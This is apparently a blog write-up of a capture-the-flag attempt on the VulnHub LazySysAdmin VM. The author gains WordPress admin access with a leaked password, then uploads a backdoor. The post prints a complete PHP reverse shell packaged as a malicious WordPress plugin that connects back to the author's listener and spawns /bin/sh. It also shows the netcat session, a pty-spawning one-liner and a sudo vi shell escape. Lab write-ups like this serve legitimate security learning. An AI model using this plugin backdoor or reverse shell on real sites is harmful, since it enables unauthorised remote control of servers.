In this post https://neilsec.com/ctf/vulnhub-lazysysadmin-1-ctf-attempt/ I had a crack at the LazySysAdmin VM from VulnHub and found the hidden flag.
However it seemed a bit odd/easy to just enumerate some website directories and find a password, whilst ignoring all the WordPress and myphpadmin bits. So I thought I’d have another look at it to see if there were other ways of rooting the box.
Back to WordPress
So going back to the WordPress site, I had a go at the login page using the credentials. WPSCAN had earlier told us that Admin was a valid username and so I tried the database password and got in.
The eagle-eyed will notice the IP address has changed but that’s just me putting the VMs on a different network.
OK so being in WordPress doesn’t allow automatic access to the server it’s on. So we need to get some code and what with it being an php driven app, a php shell would seem appropriate. I used one on this CTF that worked nicely so I’ll have a go with that. How to get it in though. The obvious target is WordPress’s plugin system which accepts php natively. So a bit of research required in that direction.
This site: http://www.r00tsec.com/2015/08/howto-create-backdoor-in-wordpress.html
gives some handy info. A WP plugin is nothing more than a php file with a bit of text added to it at the start of the php file and then compressed to a zip format. The text you apparently need to add looks something like:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 |
<?php /* Plugin Name: PHP Shell Plugin URI: https://awebaddress.com Description: A php shell Version: 1234 Author: somedomain.org Author URI: https://developer.wordpress.org/ License: GPL2 License URI: https://www.gnu.org/licenses/gpl-2.0.html Text Domain: wporg Domain Path: /languages */ |
So the complete file including Pentest Monkey’s PHP shell and my IP settings looks like this:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 |
<?php /* * Plugin Name: My Shell * Plugin URI: http://neilsec.com * Description: A PHP Reverse Shell * Author: some guy * Version: 1.0 * Author URI: http://neilsec.com * */ set_time_limit (0); $VERSION = "1.0"; $ip = '192.168.99.128'; // CHANGE THIS $port = 9999; // CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; // // Daemonise ourself if possible to avoid zombies later // // pcntl_fork is hardly ever available, but will allow us to daemonise // our php process and avoid zombies. Worth a try... if (function_exists('pcntl_fork')) { // Fork and have the parent process exit $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Can't fork"); exit(1); } if ($pid) { exit(0); // Parent exits } // Make the current process a session leader // Will only succeed if we forked if (posix_setsid() == -1) { printit("Error: Can't setsid()"); exit(1); } $daemon = 1; } else { printit("WARNING: Failed to daemonise. This is quite common and not fatal."); } // Change to a safe directory chdir("/"); // Remove any umask we inherited umask(0); // // Do the reverse shell... // // Open reverse connection $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } // Spawn shell process $descriptorspec = array( 0 => array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "w") // stderr is a pipe that the child will write to ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Can't spawn shell"); exit(1); } // Set everything to non-blocking // Reason: Occsionally reads will block, even though stream_select tells us they won't stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { // Check for end of TCP connection if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } // Check for end of STDOUT if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } // Wait until a command is end down $sock, or some // command output is available on STDOUT or STDERR $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); // If we can read from the TCP socket, send // data to process's STDIN if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } // If we can read from the process's STDOUT // send data down tcp connection if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } // If we can read from the process's STDERR // send data down tcp connection if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); // Like print, but does nothing if we've daemonised ourself // (I can't figure out how to redirect STDOUT like a proper daemon) function printit ($string) { if (!$daemon) { print "$string\n"; } } ?> |
Now I just need to zip it up and see if wordpress will accept it as a plugin.
Set up the netcat listener on the relevant port and:
|
1 2 3 4 5 6 7 8 9 |
root@kali2017-1:~# nc -nvlp 9999 listening on [any] 9999 ... connect to [192.168.99.128] from (UNKNOWN) [192.168.99.129] 51772 Linux LazySysAdmin 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux 02:05:13 up 11 min, 0 users, load average: 0.02, 0.01, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ |
Now drop the python command I used on a previous CTF to spawn a proper tty shell and we have an interactive shell.
|
1 2 3 4 5 6 |
$ python -c 'import pty; pty.spawn("/bin/sh")' $ ls ls bin dev home lib media old proc run srv tmp var boot etc initrd.img lost+found mnt opt root sbin sys usr vmlinuz $ |
However now I’m logged in under the website account www-data. I don’t know how to elevate my account other than to switch users to “togie” and use his password. If I work out how to do it without that I’ll revisit it again. If anyone reads this and has any suggestions – please comment 🙂
I did check out the phpmyadmin page but the credentials didn’t seem to have any ability to do anything useful so I’ve not bothered reporting on that.
$ sudo vi test.txt
:shell